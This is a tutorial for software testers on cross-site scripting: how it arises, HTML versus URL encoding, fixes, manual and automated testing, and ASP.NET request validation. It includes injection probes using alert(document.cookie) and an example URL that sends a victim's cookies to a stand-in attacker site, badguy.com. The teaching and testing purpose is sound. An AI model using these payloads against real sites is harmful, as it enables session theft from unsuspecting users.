Web security testing: an XSS example (JavaScript skills)

Source: Internet
Author: User
Tags: html encode, html tags, alphanumeric characters

Web Security Test XSS

XSS (Cross-Site Scripting) is the most common class of vulnerability in web applications. The attacker embeds a client-side script (such as JavaScript) in a web page; when a user browses to that page, the script runs in the user's browser and does whatever the attacker intends, for example stealing the user's cookies, redirecting to a malicious website, or delivering a Trojan.

As testers, we need to understand how XSS works, what the attack scenarios are, and how to fix it; only then can we effectively prevent XSS.

Table of Contents

    1. How does XSS happen?
    2. HTML Encode
    3. XSS attack scenarios
    4. Fixing an XSS vulnerability
    5. How to test for an XSS vulnerability
    6. The difference between HTML Encode and URL Encode
    7. XSS filters in the browser
    8. The XSS security mechanism in ASP.NET

How does XSS happen?

Suppose a page contains the following textbox:

<input type="text" name="Address1" value="Value1from">

Value1from is the user's input. If, instead of Value1from, the user enters "/><script>alert(document.cookie)</script><!-- then the markup becomes

<input type="text" name="Address1" value=""/><script>alert(document.cookie)</script><!--">

and the embedded JavaScript is executed.

Or, if the user enters " onfocus="alert(document.cookie) it becomes

<input type="text" name="Address1" value="" onfocus="alert(document.cookie)">

and the embedded JavaScript runs when the focus event fires.

How much damage the attack does depends on what script the user enters.

Of course, user-submitted data can also reach the server through the QueryString (in the URL) and through cookies, as shown in the original article's figure (not included in this copy).

HTML Encode

XSS happens because data entered by the user turns into code. So user input must be HTML-encoded before it is output: special characters such as angle brackets, single quotes and double quotes are converted into entities.

C# already has a ready-made method: just call HttpUtility.HtmlEncode("string <script>") (requires a reference to the System.Web assembly).

Fiddler also provides a convenient tool: click the "TextWizard" button on the toolbar.
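As an added example (not code from the original article), the following Python renders the Address1 textbox above with and without HTML encoding and uses the standard-library HTML parser to check whether the two inputs from the article changed the page structure; html.escape stands in for HttpUtility.HtmlEncode.

```python
import html
from html.parser import HTMLParser

# The two inputs from the article, as constructed test values.
PAYLOAD_BREAKOUT = '"/><script>alert(document.cookie)</script><!--'
PAYLOAD_EVENT = '" onfocus="alert(document.cookie)'


def render_vulnerable(value: str) -> str:
    """Reflects the submitted value into the attribute unchanged (the bug)."""
    return f'<input type="text" name="Address1" value="{value}">'


def render_encoded(value: str) -> str:
    """HTML-encodes before output, like HttpUtility.HtmlEncode; quote=True also
    converts " and ' so the value cannot close the attribute it sits in."""
    return f'<input type="text" name="Address1" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records each start tag with its attributes, roughly as a browser parses it."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def input_became_code(markup: str) -> bool:
    """True when user data changed the page structure: an element other than
    the single <input> appeared, or an on* event attribute was added to it."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    if [tag for tag, _ in parser.tags] != ["input"]:
        return True
    return any(name.startswith("on") for name in parser.tags[0][1])


if __name__ == "__main__":
    for payload in (PAYLOAD_BREAKOUT, PAYLOAD_EVENT):
        print("raw    :", input_became_code(render_vulnerable(payload)))  # True
        print("encoded:", input_became_code(render_encoded(payload)))     # False
```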

XSS attack scenarios

1. The attack process for a DOM-based XSS vulnerability is as follows.

Tom finds that a page on victim.com has an XSS vulnerability,

for example http://victim.com/search.asp?term=apple

The server-side code of the Search.asp page is roughly as follows (the listing is not included in this copy):


Tom first sets up a website, http://badguy.com, to receive the "stolen" information.
Then Tom constructs a malicious URL (below) and sends it to Monica by some means (email, QQ):

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

When Monica clicks this URL, the malicious JavaScript embedded in it runs in Monica's browser, and her cookies for victim.com are sent to the badguy website. Monica's information on victim.com has thus been stolen by Tom.

2. Stored XSS. This type of vulnerability is widespread and can compromise the security of a whole web server: the attacker uploads the attack script to the server, so every user who visits the page is exposed. The attack process is as follows.

Alex finds an XSS vulnerability on site A that lets attack code be saved in the database.

Alex publishes an article with malicious JavaScript code embedded in it.

When other people, such as Monica, view the article, the embedded JavaScript runs in Monica's browser, and her session cookie or other information is stolen by Alex.

A DOM-based XSS vulnerability threatens individual users; a stored XSS vulnerability threatens a large number of users.

Fixing an XSS vulnerability

Principle: never trust data entered by the client.

Note: the attack code is not necessarily inside <script></script>.

    1. Mark important cookies as HttpOnly so that document.cookie in JavaScript cannot read them.
    2. Only allow users to enter the data we expect. For example, in an age textbox allow only digits and filter out every other character.
    3. HTML-encode the data.
    4. Filter or remove special HTML tags such as <script> and <iframe>, for example by replacing < with &lt; and > with &gt;.
    5. Filter JavaScript event attributes such as "onclick=", "onfocus=" and so on.

How to test for an XSS vulnerability

Method one: read the code and look for the key variables. The client sends data to the web server in three main ways: QueryString, form fields, and cookies. In an ASP program, for example, the client's variables are obtained through the Request object:

<%
strUserCode = Request.QueryString("code");
strUser = Request.Form("USER");
strId = Request.Cookies("ID");
%>

If a variable is output without being passed through HTMLEncode, that variable has an XSS vulnerability.

Method two: prepare test scripts, for example:

"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
" onclick="alert(document.cookie)

Enter these test scripts into a textbox or any other place on the page where data can be entered and see whether a dialog box pops up; if it does, there is an XSS vulnerability.

Also look at which variables are passed to the web server in the URL, set those variables to our test script in the URL, and check whether the script executes.

Method three: automated XSS testing

Many XSS scanning tools are already available. Implementing automated XSS testing is also simple: use the HttpWebRequest class to send requests that contain the XSS test scripts to the web server, then check whether the test script appears unchanged in the HttpWebResponse.
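An added example (not from the article) of the response check described above, in Python rather than HttpWebRequest: it classifies how a captured response body echoes one of the article's test scripts, distinguishing raw, fully encoded and partially transformed reflections. The response bodies are constructed stand-ins for HttpWebResponse content, and the "comment" parameter is hypothetical.

```python
import html
from enum import Enum

# The article's three test scripts, used as probes; they share one marker.
PROBES = [
    '"/><script>alert(document.cookie)</script><!--',
    '<script>alert(document.cookie)</script><!--',
    '" onclick="alert(document.cookie)',
]
MARKER = "alert(document.cookie)"


class Verdict(Enum):
    NOT_REFLECTED = "input not echoed"
    ENCODED = "echoed HTML-encoded: safe"
    PARTIAL = "echoed but altered: inspect by hand"
    RAW = "echoed unchanged: XSS"


def classify_reflection(body: str, probe: str) -> Verdict:
    """Decide how a response body echoed the probe. The raw check comes first:
    a page may contain an encoded copy and a raw copy at the same time."""
    if probe in body:
        return Verdict.RAW
    if html.escape(probe, quote=True) in body:
        return Verdict.ENCODED
    if MARKER in body:  # e.g. only quotes or only brackets were encoded
        return Verdict.PARTIAL
    return Verdict.NOT_REFLECTED


def scan_responses(responses: dict[str, str], probe: str) -> dict[str, Verdict]:
    """One verdict per injected parameter, from its captured response body."""
    return {param: classify_reflection(body, probe) for param, body in responses.items()}


def sample_responses(probe: str) -> dict[str, str]:
    """Constructed bodies standing in for HttpWebResponse content: what the
    article's ASP variables (plus a hypothetical 'comment' field) might echo
    under four different server behaviours."""
    quotes_only = probe.replace('"', "&quot;")  # a common half-fix
    return {
        "code": f"<p>Code: {probe}</p>",                           # echoed raw
        "USER": f"<p>User: {html.escape(probe, quote=True)}</p>",  # HtmlEncode'd
        "ID": "<p>Welcome back</p>",                               # never echoed
        "comment": f'<input value="{quotes_only}">',               # quotes only
    }


if __name__ == "__main__":
    for probe in PROBES:
        for param, verdict in scan_responses(sample_responses(probe), probe).items():
            print(f"{param:8} {verdict.value}")
```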

The difference between HTML Encode and URL Encode

At first I always confused these two; in fact they are two different things.

HTML encoding was introduced above. URL encoding exists to make a URL conform to the URL specification, because the standard does not allow Chinese and many other characters to appear in a URL.

For example, searching Baidu for "test Chinese characters" produces the URL

http://www.baidu.com/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477

So-called URL encoding means: every non-alphanumeric character is replaced by a percent sign (%) followed by two hexadecimal digits, and a space is encoded as a plus sign (+).

C# already has a ready-made method: just call HttpUtility.UrlEncode("string <script>") (requires a reference to the System.Web assembly).

Fiddler also provides a convenient tool: click the "TextWizard" button on the toolbar.
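The following Python, added here and not part of the article, shows the two encodings side by side: quote_plus reproduces the Baidu query above (the search term 测试汉字 is recovered from the URL's GBK bytes), and parse_qs shows that the server undoes URL encoding before Request.QueryString hands the value to the page, so only HTML encoding protects the output.

```python
import html
from urllib.parse import parse_qs, quote_plus, urlsplit


def url_encode_param(name: str, value: str, charset: str = "utf-8") -> str:
    """Transport encoding for one query parameter: every non-alphanumeric byte
    of the value (in the given charset) becomes %XX, a space becomes '+'."""
    return f"{name}={quote_plus(value, encoding=charset)}"


def html_encode(value: str) -> str:
    """Output encoding for HTML: <, >, &, " and ' become character entities."""
    return html.escape(value, quote=True)


def server_side_value(url: str, param: str) -> str:
    """What Request.QueryString(param) hands the page: the URL encoding has
    already been undone, so the original < and > are back."""
    return parse_qs(urlsplit(url).query)[param][0]


if __name__ == "__main__":
    # The article's Baidu URL carries the search term as GBK bytes.
    print(url_encode_param("wd", "测试汉字", "gbk"))       # wd=%B2%E2%CA%D4%BA%BA%D7%D6
    print(url_encode_param("term", "string <script>"))  # term=string+%3Cscript%3E
    print(html_encode("string <script>"))               # string &lt;script&gt;
    url = "http://victim.com/search.asp?" + url_encode_param(
        "term", "<script>alert(document.cookie)</script><!--")
    raw = server_side_value(url, "term")
    print(raw)               # the script tag, intact: URL encoding protected nothing
    print(html_encode(raw))  # what search.asp must emit instead
```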

XSS filters in the browser

To prevent XSS, many browser vendors have added XSS filtering to their browsers. IE8, IE9, Firefox and Chrome, for example, all have security mechanisms against XSS and can block it, as shown in the original article's figure (not included in this copy).

If you need to do a test, it is best to use IE7.

The XSS security mechanism in ASP.NET

ASP.NET has a built-in mechanism for preventing XSS: submitted forms are automatically checked for XSS, and when a user tries to enter XSS code, ASP.NET throws an error, as shown in the original article's figure (not included in this copy).

Many programmers have no concept of security and do not even know that XSS exists. ASP.NET is secure by default on this point, so even programmers without security awareness can write a "safer" website.

If you want to disable this security feature, use <%@ Page ValidateRequest="false" %>

That is all for XSS in web security testing. We will continue to collate related software-testing material; thank you for supporting this site!
